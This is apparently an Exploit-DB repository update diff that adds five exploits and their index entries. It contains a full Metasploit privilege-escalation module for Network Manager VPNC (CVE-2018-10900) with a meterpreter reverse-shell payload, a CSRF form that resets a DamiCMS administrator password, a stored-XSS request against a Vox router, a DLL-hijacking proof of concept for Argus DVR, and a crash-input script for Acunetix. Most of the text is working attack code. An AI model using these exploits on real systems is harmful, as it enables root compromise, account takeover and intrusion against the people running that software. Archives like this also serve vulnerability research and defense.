DB: 2018-09-01

5 changes to exploits/shellcodes

Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
Argus Surveillance DVR 4.0.0.0 - Privilege Escalation
Network Manager VPNC - Username Privilege Escalation (Metasploit)
Vox TG790 ADSL Router - Cross-Site Scripting
DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)

exploits/hardware/webapps/45310.txt

@@ -0,0 +1,33 @@
+# Title: Vox TG790 ADSL Router - Cross-Site Scripting
+# Author: Cakes
+# Exploit Date: 2018-08-01
+# Vendor: Vox Telecom
+# Link: https://www.vox.co.za/
+# Firmware Version: 6.2.W.1
+# CVE: N/A
+ 
+# Description
+# Due to improper user iunput management low privilege users are able to create 
+# a persistent Cross-Site scripting attack via the phone book function. 
+ 
+# PoC
+POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
+Host: 192.168.1.254
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
+Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 141
+
+0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=<script>altert("TESTER");</script>
+
+# Response
+HTTP/1.0 200 OK
+Cache-Control: no-cache
+Expires: -1
+Content-Type: text/html

exploits/linux/local/45313.rb

@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Network Manager VPNC Username Privilege Escalation',
+      'Description'    => %q{
+        This module exploits an injection vulnerability in the Network Manager
+        VPNC plugin to gain root privileges.
+
+        This module uses a new line injection vulnerability in the configured
+        username for a VPN network connection to inject a `Password helper`
+        configuration directive into the connection configuration.
+
+        The specified helper is executed by Network Manager as root when the
+        connection is started.
+
+        Network Manager VPNC versions prior to 1.2.6 are vulnerable.
+
+        This module has been tested successfully with VPNC versions:
+        1.2.4-4 on Debian 9.0.0 (x64); and
+        1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Denis Andzakovic', # Discovery and exploit
+          'Brendan Coles'     # Metasploit
+        ],
+      'DisclosureDate' => 'Jul 26 2018',
+      'References'     =>
+        [
+          ['CVE', '2018-10900'],
+          ['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
+          ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
+          ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
+          ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
+          ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
+          ['URL', 'https://www.debian.org/security/2018/dsa-4253'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
+          ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
+          'WfsDelay'    => 10,
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def check
+    unless command_exists? 'nmcli'
+      vprint_error 'Network Manager nmcli utility is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'nmcli utility is installed'
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
+    payload_path = "#{base_dir}/#{@payload_name}"
+
+    print_status 'Adding VPN connection...'
+    vpn_data = []
+    vpn_data << '+vpn.data "IKE DH Group = dh2"'
+    vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
+    vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
+    vpn_data << '+vpn.data "IPSec secret-flags = 4"'
+    vpn_data << '+vpn.data "Local Port = 0"'
+    vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
+    vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
+    vpn_data << '+vpn.data "Vendor = cisco"'
+    vpn_data << '+vpn.data "Xauth password-flags = 4"'
+    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
+    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
+    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
+    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
+    if res.include? 'Error'
+      fail_with Failure::Unknown, 'Could not create VPN connection'
+    end
+
+    res = cmd_exec 'nmcli connection'
+    unless res.include? @payload_name
+      fail_with Failure::Unknown, 'Could not create VPN connection'
+    end
+
+    print_status 'Uploading payload...'
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Starting VPN connection...'
+    cmd_exec "nmcli connection up #{@payload_name} & echo "
+  end
+
+  def cleanup
+    print_status 'Removing VPN connection...'
+    res = cmd_exec "nmcli connection delete #{@payload_name}"
+    unless res.include? 'successfully deleted'
+      print_warning "Could not remove VPN connection #{@payload_name}"
+    end
+    super
+  end
+end

exploits/php/webapps/45314.txt

@@ -0,0 +1,28 @@
+# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
+# Author: Autism_JH
+# Date: 2018-08-30
+# Vendor Homepage: https://github.com/731276192/damicms
+# Software Link: https://github.com/731276192/damicms
+# Version: 6.0.0
+# CVE: CVE-2018-15844
+
+# Description:
+# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
+# After the administrator login in,open the poc,the administrator account's 
+# password will been changed to 123123
+
+# POC:
+<html>
+<!-- CSRF PoC - generated by Burp Suite Professional -->
+	<body>
+		<script>history.pushState('', '', '/')</script>
+		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
+			<input type="hidden" name="username" value="admin" />
+			<input type="hidden" name="password" value="123123" />
+			<input type="hidden" name="role&#95;id" value="1" />
+			<input type="hidden" name="id" value="1" />
+			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
+			<input type="submit" value="Submit request" />
+		</form>
+	</body>
+</html>

exploits/windows_x86-64/dos/45311.py

@@ -0,0 +1,27 @@
+# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
+# Exploit Author: Ali Alipour
+# Date: 2018-08-22
+# Vendor Homepage : https://www.acunetix.com/
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the Acunetix WVS Reporter 10.0 program. 
+# In the new window click "Report Preview" > "Load Report". 
+# And upload a sample report >> Then click on the print button .
+# Now Paste the content of "exploit.txt" into the field: " Pages ". 
+# Click "OK" and you will see a Crash.
+
+#!/usr/bin/python
+    
+buffer = "A" * 20
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/local/45312.c

@@ -0,0 +1,56 @@
+# Exploit Title: Argus Surveillance DVR 4.0.0.0 - Privilege Escalation
+# Author: John Page (aka hyp3rlinx)
+# Date: 2018-08-29
+# Vendor: Argus Surveillance DVR - 4.0.0.0
+# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
+# CVE: N/A
+# Tested on: Windows 7 x86
+
+# Description:
+# Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation.
+# Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will 
+# lead to arbitrary code execution with SYSTEM integrity
+# Affected Component: DVRWatchdog.exe
+
+# Exploit/POC
+# Create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, 
+# launch Argus DVR tada! your now SYSTEM.
+
+#include <windows.h>
+
+/* hyp3rlinx */
+
+/*
+gcc -c -m32 gsm_codec.c
+gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
+*/
+
+void systemo(){
+	 MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
+	switch(fdwReason){
+		case DLL_PROCESS_ATTACH:{
+			 systemo();
+			break;
+		}
+		case DLL_PROCESS_DETACH:{
+			 systemo();
+			break;
+		}
+		case DLL_THREAD_ATTACH:{
+			 systemo();
+			break;
+		}
+		case DLL_THREAD_DETACH:{
+			 systemo();
+			break;
+		}
+	}
+	
+	return TRUE;
+}
+
+# https://vimeo.com/287115698
+# Greetz: ***Greetz: indoushka | Eduardo | GGA***

files_exploits.csv

@@ -6086,6 +6086,7 @@ id,file,description,date,author,type,platform,port
 45301,exploits/windows_x86-64/dos/45301.py,"Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)",2018-08-29,"Jose Miguel Gonzalez",dos,windows_x86-64,
 45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64,
 45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64,
+45311,exploits/windows_x86-64/dos/45311.py,"Acunetix WVS Reporter 10.0 - Denial of Service (PoC)",2018-08-31,"Ali Alipour",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9926,6 +9927,8 @@ id,file,description,date,author,type,platform,port
 45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
 45288,exploits/linux/local/45288.py,"SIPP 3.3 - Stack-Based Buffer Overflow",2018-08-29,"Juan Sacco",local,linux,
 45289,exploits/windows/local/45289.py,"R 3.4.4 - Buffer Overflow (SEH)",2018-08-29,ZwX,local,windows,
+45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
+45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39902,3 +39905,5 @@ id,file,description,date,author,type,platform,port
 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,
 45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
 45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,
+45310,exploits/hardware/webapps/45310.txt,"Vox TG790 ADSL Router - Cross-Site Scripting",2018-08-31,cakes,webapps,hardware,
+45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php,